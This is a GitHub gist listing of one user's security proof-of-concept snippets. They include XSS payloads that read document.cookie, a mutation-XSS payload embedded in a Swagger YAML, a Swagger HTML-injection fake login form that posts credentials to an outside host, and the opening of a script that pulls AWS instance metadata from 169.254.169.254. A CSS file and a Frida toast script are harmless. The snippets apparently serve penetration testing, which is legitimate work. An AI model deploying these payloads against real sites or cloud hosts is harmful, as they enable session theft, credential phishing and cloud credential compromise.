Skip to content

Instantly share code, notes, and snippets.

View eduquintanilha's full-sized avatar
👩‍🚀

Eduardo Quintanilha eduquintanilha

👩‍🚀
55 followers · 146 following
View GitHub Profile
@eduquintanilha
eduquintanilha / x.html
Last active October 31, 2024 19:39
XSS HTML
<html>
<img src=x onerror=alert(document.cookie);prompt(document.cookie,1)>
</html>
@eduquintanilha
eduquintanilha / xss.json
Created November 8, 2023 21:10
xss json
{
"url": "https://gist.github.com/eduquintanilha/606fec1080eb63fa4a22f091e8ebfac7/raw/4f605290dc8f8846a186d44826a4e4d8d18457c0/xss.yaml",
"urls": [
{
"url": "https://gist.github.com/eduquintanilha/606fec1080eb63fa4a22f091e8ebfac7/raw/4f605290dc8f8846a186d44826a4e4d8d18457c0/xss.yaml",
"name": "Test"
}
]
}
@eduquintanilha
eduquintanilha / xss.yaml
Last active March 12, 2025 18:31
test xss yml
swagger: '2.0'
info:
title: XSS Attack Test
description: |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=prompt(1337,document.cookie) src=1>"></form>
version: production
basePath: /
produces:
- application/xml
- application/json
@eduquintanilha
eduquintanilha / test.css
Last active November 8, 2023 19:30
just test css
h1 {
color: gray;
margin-left: 20px;
}
button {
padding: 2px;
margin: 1px solid red;
}
@eduquintanilha
eduquintanilha / fake-login.json
Last active November 7, 2023 16:03
swagger injection poc - json config file
{
"url": "https://gist.github.com/eduquintanilha/dfad096d3be348c46814b25c2dd722c9/raw/b24b9a6d5ee951f45297677635320a198d4373a7/fake-login.yaml",
"urls": [
{
"url": "https://gist.github.com/eduquintanilha/dfad096d3be348c46814b25c2dd722c9/raw/b24b9a6d5ee951f45297677635320a198d4373a7/fake-login.yaml",
"name": "Test"
}
]
}
@eduquintanilha
eduquintanilha / fake-login.yaml
Last active November 7, 2023 16:02
swagger-injection-poc
swagger: '2.0'
info:
version: 1.0.0
title: Fake Login Page
description: '<div class="login-form">
<div class="heading">
<h1>HTML Injection : Fake Login</h1>
</div>
<div class="form-container">
<form action="https://test.quintanilha.com/login" method="post" class="form-signin">
@eduquintanilha
eduquintanilha / makeToast.js
Created May 24, 2023 01:31 — forked from myzhan/makeToast.js
Frida android make toast
Java.scheduleOnMainThread(function() {
Toast = Java.use("android.widget.Toast");
var currentApplication = Java.use('android.app.ActivityThread').currentApplication();
var context = currentApplication.getApplicationContext();
Toast.makeText(context,"hello world", Toast.LENGTH_SHORT.value).show();
});
@eduquintanilha
eduquintanilha / aws-dump.sh
Last active August 3, 2022 19:40
#!/bin/bash
# https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
METADATA_TOKEN=test
function get {
./curl -sf http://169.254.169.254/latest/$1 2> /dev/null
}
>&2 echo "Fetching metadata..."
@eduquintanilha
eduquintanilha / login-poc.html
Created May 25, 2022 13:05
<html>
<body>
<input type="text" id="user"></input>
<input type="password" id="password"></input>
<button id="login">Entrar</button>
<script>
let button = document.querySelector('#login')
button.addEventListener('click', function clicou() {
const user = document.querySelector('#user').value;
@eduquintanilha
eduquintanilha / poc-shell.sh
Created September 30, 2021 16:12
poc-shell.sh
echo WORK
id
whoami